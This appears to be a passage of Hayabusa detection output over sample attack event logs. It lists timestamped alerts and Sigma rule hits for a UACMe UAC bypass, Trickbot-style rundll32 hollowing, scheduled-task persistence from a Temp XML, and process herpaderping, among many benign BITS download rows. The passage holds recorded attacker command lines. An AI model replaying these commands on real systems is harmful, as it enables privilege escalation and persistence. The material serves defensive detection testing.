Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:55.450 +09:00,DESKTOP-NTSSLJD,11,high,UAC Bypass Using IEInstal - File,,rules/sigma/file_event/sysmon_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe : Path: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe : User: DESKTOP-NTSSLJD\den : Parent Command: ""C:\Program Files\Internet Explorer\IEInstal.exe"" -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.490 +09:00,DESKTOP-NTSSLJD,1,high,UAC Bypass Using IEInstal - Process,,rules/sigma/process_creation/win_uac_bypass_ieinstal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-20 20:50:56.569 +09:00,DESKTOP-NTSSLJD,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059.003,technique_name=Windows Command Shell : Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: DESKTOP-NTSSLJD\den : Parent Command: C:\Users\den\AppData\Local\Temp\IDC1.tmp\[1]consent.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_64.evtx +2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\wermgr.exe : Path: C:\Windows\System32\wermgr.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32.exe 
c:\temp\winfire.dll,DllRegisterServer",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-21 07:33:02.063 +09:00,MSEDGEWIN10,1,critical,Trickbot Malware Activity,,rules/sigma/process_creation/win_malware_trickbot_wermgr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-21 07:33:02.064 +09:00,MSEDGEWIN10,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-21 07:35:26.755 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding : Path: C:\Windows\System32\wbem\WmiPrvSE.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_hollowing_wermgr_masquerading.evtx +2020-10-24 06:55:59.769 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{2015B2D1-1706-42F6-8C0E-8BEECB408D48}-86.0.4240.111_86.0.4240.75_chrome_updater.exe : URL: http://r2---sn-5hnekn7z.gvt1.com/edgedl/release2/chrome/E4_ltUMmNI-KvJYPRyaXng_86.0.4240.111/86.0.4240.111_86.0.4240.75_chrome_updater.exe?cms_redirect=yes&mh=3q&mip=213.127.65.23&mm=28&mn=sn-5hnekn7z&ms=nvh&mt=1603490058&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 06:57:29.217 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding : Path: C:\Windows\System32\wbem\WmiPrvSE.exe : User: 
NT AUTHORITY\NETWORK SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948 : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: c:\Users\Public\test.tmp ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.399 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers : Path: C:\Windows\SysWOW64\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\rundll32.exe"" conf3234.dll f8753 d948",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers : Path: C:\Windows\SysWOW64\schtasks.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" /C schtasks /Create /f /XML C:\Users\IEUser\AppData\Local\Temp\sduchxll.tmp /TN DataUsageHandlers",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:57:36.631 +09:00,MSEDGEWIN10,1,high,Suspicius Add Task From User AppData 
Temp,,rules/sigma/process_creation/win_pc_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:17.176 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,1,high,Suspicious Call by Ordinal,,rules/sigma/process_creation/win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:21.695 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 
4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 06:58:22.066 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" DATAUS~1.DLL f8755 4624665222 rd : Path: C:\Windows\SysWOW64\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 22:15:50.672 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 22:53:41.949 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amaWj.img?w=100&h=100&m=6&tilesize=medium&x=1912&y=840&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 22:53:43.173 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 23:25:16.281 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: 
https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 23:25:17.595 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-25 00:07:57.551 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amczd.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-25 00:07:57.815 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-25 05:37:35.394 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amg5S.img?w=100&h=100&m=6&tilesize=medium&x=2238&y=680&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: "".\samir.exe"" : Path: C:\Users\bouss\Downloads\samir.exe : User: LAPTOP-JU4M3I0E\bouss : 
Parent Command: ProcessHerpaderping.exe ""c:\Program Files\Internet Explorer\iexplore.exe"" .\samir.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx +2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx +2020-11-02 03:28:53.729 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:30:10.144 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:30:10.448 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:30:10.667 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary : URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:30:11.059 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary : URL: 
https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-02 03:33:01.610 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 19:55:56.114 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{DE1AA2CB-2733-420D-BD53-D15E1761ED0D}-86.0.4240.183_86.0.4240.111_chrome_updater.exe : URL: http://r2---sn-5hnekn7d.gvt1.com/edgedl/release2/chrome/APOVneiKVAxsNCc0oAg3ibQ_86.0.4240.183/86.0.4240.183_86.0.4240.111_chrome_updater.exe?cms_redirect=yes&mh=T1&mip=213.127.67.78&mm=28&mn=sn-5hnekn7d&ms=nvh&mt=1604573655&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 19:59:25.802 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 19:59:51.480 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 20:03:04.083 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform 
Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aHmh2.img?w=100&h=100&m=6&tilesize=medium&x=2005&y=1451&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 20:03:05.093 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 20:03:06.197 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/29.jpg?a,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 21:31:12.664 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 21:31:12.941 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 21:33:21.719 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aFbhf.img?w=100&h=100&m=6&tilesize=medium&x=2920&y=321&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-06 00:25:28.955 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aIYx8.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-06 00:25:30.216 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-06 19:52:28.687 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aKxpG.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-06 23:56:52.824 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-08 00:33:50.498 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: 
Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19R5M0.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-08 00:36:30.267 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-08 00:36:30.760 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 17:25:00.043 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download : URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 17:28:07.533 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 17:28:08.240 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 
Control/bits_openvpn.evtx +2020-11-09 20:33:58.291 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aPIV0.img?w=100&h=100&m=6&tilesize=medium&x=1544&y=1092&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 20:33:58.749 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 20:33:59.731 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/32.jpg?a,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 22:29:29.376 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 22:29:29.868 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-10 21:35:58.814 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job 
Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-10 21:36:00.732 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 21:51:23.040 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON : URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 21:51:33.078 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml : URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.703 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.714 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.718 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1 : URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-12 00:56:12.722 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push 